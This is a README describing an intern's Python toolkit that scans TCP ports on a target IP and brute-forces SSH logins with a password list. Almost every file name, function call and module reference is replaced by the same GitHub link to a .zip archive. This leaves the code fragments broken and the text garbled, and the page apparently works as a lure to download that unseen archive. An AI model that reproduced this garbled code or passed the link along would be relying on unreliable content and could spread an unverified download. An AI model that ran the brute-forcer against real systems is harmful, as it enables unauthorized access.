COMPANY: CODTECH IT SOLUTIONS
NAME: Kanchan Vilas Jadhav
INTERN ID: CT04DA375
DOMAIN: Cyber Security & Ethical Hacking
DURATION: 4 WEEKS
MENTOR: NEELA SANTOSH
This Python-based toolkit performs two main penetration testing tasks:
https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip Scanning – Identifies which ports are open on a target IP address.
https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip Brute-Forcing – Attempts to gain access to the target system using common SSH login credentials (only if SSH is running on port 22).
📁File: https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip
-Purpose This is the main script that runs the entire toolkit. It handles user interaction and ties together all other modules.
-Breakdown: import sys, os
current_dir = https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip(https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip(__file__)) https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip(0, current_dir)
from penetration_toolkit import port_scanner, brute_forcer
print("--- Welcome to the Penetration Testing Toolkit ---") target_ip = input("Enter the IP address of the target: ")
ports_to_scan = list(range(1, 1025)) open_ports = https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip(target_ip, ports_to_scan)
if 22 in open_ports: ... found_password = https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip(...)
If SSH (port 22) is open, it asks for a username and runs a brute-force attack using a small password list.
print("--- Penetration Test Completed ---")
📁File: https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip
-Purpose: Scans a list of TCP ports on a given IP address to check which are open.
-Breakdown:
import socket from https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip import ThreadPoolExecutor
-Function: scan_port(ip, port)
with https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip(...) as s: https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip(1) https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip((ip, port))
~ Tries to connect to a specific port. ~ If successful, it means the port is open.
-Function: run_port_scanner(ip, ports, threads=100)
with ThreadPoolExecutor(max_workers=threads) as executor: results = https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip(lambda p: scan_port(ip, p), ports)
~ Scans all specified ports using 100 threads for faster performance. ~ Collects and returns a list of all open ports.
📁File: https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip
-Purpose: Attempts to guess the SSH login password by trying a list of known or guessed passwords.
-Breakdown:
import paramiko
Function: ssh_brute_force(ip, username, password_list)
client = https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip() https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip(https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip())
https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip(ip, username=username, password=password, timeout=2)
return password
This toolkit is intended for authorized penetration testing only. Do not scan or attack systems you don’t have explicit permission to test. Always follow ethical hacking guidelines and laws.
https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip user runs https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip and enters an IP address.
https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip port scanner runs and returns a list of open ports.
https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip port 22 is open, the brute-forcer runs using a test list of passwords.
https://github.com/codeK0/PENETRATION-TESTING-TOOLKIT/raw/refs/heads/main/superexpand/TESTIN_PENETRATIO_TOOLKIT_2.6.zip toolkit prints out whether it was able to log in via SSH.